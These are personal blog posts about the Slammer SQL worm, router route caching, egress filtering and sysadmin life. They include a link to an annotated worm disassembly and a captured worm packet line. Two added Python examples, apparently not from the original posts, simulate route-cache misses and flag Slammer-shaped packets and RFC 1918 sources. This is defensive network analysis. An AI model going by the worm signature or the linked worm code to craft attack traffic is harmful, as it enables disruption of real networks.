Sean’s Obsessions

Sean Walberg’s blog

Random Thoughts for the Morning

This article from O’Reilly goes over the impact the Slammer worm had on routers. I’ve commented below…

This article explains a bit about ReiserFS. While ext3 has likely removed the need to choose ReiserFS simply for journalling, Reiser has some performance features that make it attractive for applications that use lots of small files, such as cache engines.

High-end routers make use of route caching to improve performance, usually processing the first packet of a flow the slow way so that successive packets can go the quick way. However, the worm is only one packet long, so every packet is a "first packet" and the router’s caching is for naught. A router’s primary task is to route packets; if it gets too busy doing that, it will drop other tasks, such as routing protocol handling. Do this on your BGP link, and you’ll flap. Flap, and you get dampened. Get dampened, and you’re offline for a bit.

This behaviour isn’t limited to the worm. You know those printer management tools that flood your network with SNMP requests looking for printers? Yeah, they’ll do that too. I can’t count the number of 2am pages I had until I figured that one out.
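To put numbers on the route-cache point above, here is an added example (my own toy model, not anything from the O’Reilly article or the post): an LRU route cache fed first with normal traffic, a handful of long-lived flows, and then with worm-style traffic, one packet per fresh destination. The traffic mixes, the cache size and the 1 packet = 1 lookup model are all constructed assumptions.

```python
from collections import OrderedDict
import random


class RouteCache:
    """Toy LRU route cache: the first packet to a destination takes the slow path."""

    def __init__(self, capacity):
        self.capacity = capacity
        self.entries = OrderedDict()
        self.slow_path = 0
        self.fast_path = 0

    def forward(self, dst):
        if dst in self.entries:               # cache hit: fast path
            self.entries.move_to_end(dst)
            self.fast_path += 1
            return "fast"
        self.slow_path += 1                   # miss: full lookup, then install the entry
        if len(self.entries) >= self.capacity:
            self.entries.popitem(last=False)  # evict the least recently used entry
        self.entries[dst] = True
        return "slow"

    def slow_fraction(self):
        total = self.slow_path + self.fast_path
        return self.slow_path / total if total else 0.0


def normal_traffic(packets, flows, seed=1):
    """Constructed sample: many packets spread over a handful of long-lived flows."""
    rng = random.Random(seed)
    dsts = ["10.0.0.%d" % i for i in range(flows)]
    return [rng.choice(dsts) for _ in range(packets)]


def worm_traffic(packets, seed=2):
    """Constructed sample: one packet per pseudo-random destination, a scanning worm's pattern."""
    rng = random.Random(seed)
    return [".".join(str(rng.randrange(1, 224)) for _ in range(4)) for _ in range(packets)]


def slow_path_fraction(destinations, cache_size=256):
    """Share of packets that missed the cache and had to be processed the slow way."""
    cache = RouteCache(cache_size)
    for dst in destinations:
        cache.forward(dst)
    return cache.slow_fraction()


if __name__ == "__main__":
    print("normal traffic, slow-path fraction:", slow_path_fraction(normal_traffic(10000, 50)))
    print("worm traffic, slow-path fraction:  ", slow_path_fraction(worm_traffic(10000)))
```

With 50 flows the cache warms up after 50 misses and everything else is fast-path; with the worm essentially every packet misses, which is the CPU load that starves BGP keepalives.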

Sigh

Last issue of the Linux newsletter out the door.

What to do with my newfound free time?

- Study for the CCIE-Written
- Try to get an article in print
- Work on some projects I’ve been putting off
- Spend more time with the family.

Stick a Fork in Me…

… I’m done. More specifically, I’m done with the Linux Newsletter. I guess advertising isn’t what it used to be, so the powers-that-be at Cramsession stopped my newsletter and a few others, and reduced the frequency of some others.

It was fun while it lasted. Thanks to all my readers, especially those of you who wrote in with your comments and suggestions.

RHN Just Rocks

I’ve always been cheap and handled patching of Red Hat systems myself, usually by keeping a local mirror of the updates tree. I recently started using the Red Hat network - $5US per machine per month - to keep about 10 machines in order.

It’s completely web based. I get an email when a new patch is out. A couple of clicks, and a system is updated. At any time I can check the status of my machines, see if they are up to date, or even install new software. Why have I been wasting my time before?

Plus, as a coworker points out, it’s giving money to Red Hat, which is a Good Thing (no, I’m not a shareholder).

If you’re installing Red Hat, I’d suggest signing up to RHN. Your first machine is free, so you’ve got little to lose.

Developers, Developers, Developers

Why is it that developers want to turn your firewalls into routers?

I spent a good part of my afternoon trying to convince some developers that the IIS web server should be separated from the rest of the databases (think “confidential information” here). In the event that the web server (which speaks to the Internet) gets rooted, the attacker is right next to the crown jewels. At least if there is a firewall in the way, he’s got more work to do, and more chance that he’ll trip an alarm.

In the end, we compromised. Still not happy, but tradeoffs have to happen.

CSS Is Kicking My Ass

So I figure that I should at least customize this site, make it look *somewhat* different than the default MT theme. Trouble is, I haven’t done any real HTML in ages, I’ve always done my coding and passed it off to the designers.

MT uses CSS. Even though I could ignore its stylesheets and start over, I guess I should get with it and hash it out. The specifications are good, as are Darren Harkness’ tutorials on Cramsession.

I’ve figured out enough of this MT thing to get a separate staging area going. Time will tell. Time will tell.

Wake Up, ISPs!

This whole SQL worm thing has got me in a knot. Not because it ruined a good Saturday afternoon, but because it points out the ineptitude of admins out there.

I’m not talking about the people who didn’t patch their SQL servers. Keeping up with all the Microsoft patches must be hell. No, I’m talking about the people that run the networks.

For fun, I fired up tcpdump on my gateway and looked at the source addresses of the people attacking me. I saw several RFC 1918 addresses – you know them, 10.0.0.0/8, 172.16.0.0/12, and 192.168.0.0/16. What are they doing on the Internet? Did the admins of the site not block them going outbound, or at least, NAT? How did these packets traverse the backbone?

We live in an insecure world because everyone is pointing their fingers the other way. We complain that we get DoSed, yet we don’t take measures to ensure that we can’t be a launching point for a DoS (egress filtering; look it up). As much as I think Microsoft puts out buggy software, keeping up to date on patches is not the complete solution.

Wake up, people. Filter. Sanity check. Be a good internet neighbour.

Thanks, Microsoft

It’s amazing that 376 bytes can do some serious damage to the Internet.

This SQL worm that is running around is pretty simple. Overflow. Send. Repeat.

http://www.boredom.org/~cstone/worm-annotated.txt

13:19:05.663164 168.156.112.158.3151 > h24-85-10-25.wp.shawcable.net.ms-sql-m: udp 376
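As an added example that is not from the post (the tcpdump line above is the only original capture here): a small Python triage of old-style tcpdump summary lines, flagging packets whose source is an RFC 1918 address (the egress-filtering complaint from Wake Up, ISPs!) and packets with the worm’s shape, a 376-byte UDP datagram to ms-sql-m. The sample capture is constructed from documentation address ranges; the line format regex and the "slammer-shape" rule are my assumptions.

```python
import ipaddress
import re

# Old-style tcpdump summary line, as in the post: "time src.sport > dst.dport: udp length"
LINE_RE = re.compile(r"^(\S+) (\S+)\.([^.\s]+) > (\S+)\.([^.\s]+): udp (\d+)$")

# RFC 1918 private blocks: nothing sourced from these belongs on the public Internet.
RFC1918 = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
# Shape of the worm datagram from the post: 376 bytes of UDP to ms-sql-m (1434/udp).
SLAMMER_PORTS = {"ms-sql-m", "1434"}
SLAMMER_LEN = 376


def is_rfc1918(addr):
    """True if addr is a literal IPv4 address inside an RFC 1918 block."""
    try:
        ip = ipaddress.ip_address(addr)
    except ValueError:            # resolved hostname rather than an address: cannot judge
        return False
    return any(ip in net for net in RFC1918)


def classify(line):
    """Parse one summary line; return None if it is not a UDP line in the expected format."""
    m = LINE_RE.match(line)
    if not m:
        return None
    _ts, src, _sport, _dst, dport, length = m.groups()
    flags = []
    if is_rfc1918(src):
        flags.append("rfc1918-source")   # should have been dropped by the sender's egress filter
    if dport in SLAMMER_PORTS and int(length) == SLAMMER_LEN:
        flags.append("slammer-shape")    # matches the single-packet worm signature
    return {"src": src, "dport": dport, "len": int(length), "flags": flags}


def triage(lines):
    """Keep only the lines that raised at least one flag."""
    return [r for r in map(classify, lines) if r and r["flags"]]


# Constructed sample capture (documentation addresses and an example hostname, not real hosts).
SAMPLE = """\
13:19:05.663164 192.0.2.10.3151 > gw.example.net.ms-sql-m: udp 376
13:19:05.701122 10.4.7.22.1040 > 192.0.2.55.1434: udp 376
13:19:05.722901 172.20.1.9.53 > 192.0.2.55.53: udp 61
13:19:06.004410 198.51.100.7.1234 > 192.0.2.55.ms-sql-m: udp 120
"""

if __name__ == "__main__":
    for row in triage(SAMPLE.splitlines()):
        print(row["src"], "->", row["dport"], row["len"], ",".join(row["flags"]))
```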

First Post

People nag me because I haven’t updated my site in ages. Maybe this will shut them up :)